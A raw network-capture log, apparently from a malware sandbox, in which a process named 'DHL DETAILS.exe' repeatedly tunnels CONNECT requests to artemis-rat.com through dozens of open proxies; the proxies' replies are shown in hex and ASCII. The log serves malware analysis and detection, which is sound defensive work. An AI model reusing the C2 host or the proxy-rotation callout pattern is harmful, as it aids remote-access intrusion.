Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	50598	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.831099987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	50378	104.25.184.189	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.838058949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.992250919 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49713	162.241.158.204	52980	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.840153933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.950248957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.974061012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.029175997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117455959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	50403	104.18.234.218	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.840346098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.994524002 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	50259	91.241.217.58	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.858978033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	50420	34.49.208.221	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.861345053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	50377	35.185.196.38	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.892009974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.089198112 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	50353	194.34.232.107	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.892249107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.197702885 CET	442	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	50442	91.134.140.160	49687	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.894251108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	50363	13.37.59.99	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.894352913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.193058968 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	50299	120.76.42.209	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.894359112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
150	192.168.2.5	50428	43.153.22.29	10005	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.894556046 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:13.069010973 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:13.069104910 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
151	192.168.2.5	50361	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.894885063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
152	192.168.2.5	50385	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.895379066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
153	192.168.2.5	50475	104.129.199.57	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.899624109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.060360909 CET	125	IN	HTTP/1.1 407 Unauthorized Server: Zscaler/6.2 Cache-control: no-cache Content-Length: 0 Proxy-Authenticate: Negotiate

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
154	192.168.2.5	50374	184.178.172.5	15303	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.902287006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
155	192.168.2.5	50695	218.145.131.182	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.902369976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
156	192.168.2.5	50386	94.131.63.44	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.912048101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.397763014 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
157	192.168.2.5	50382	172.245.159.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.914601088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.473735094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.176882982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.867851973 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx/1.9.9 Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 172 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.9</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
158	192.168.2.5	50346	185.158.114.14	25697	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.915977955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
159	192.168.2.5	50373	27.96.235.171	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.940546989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.240761042 CET	326	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
160	192.168.2.5	50236	124.163.236.54	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.945911884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
161	192.168.2.5	50543	104.17.248.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.947057009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.101495028 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
162	192.168.2.5	50553	172.67.181.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.948517084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.102737904 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
163	192.168.2.5	50557	104.16.108.204	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.949538946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
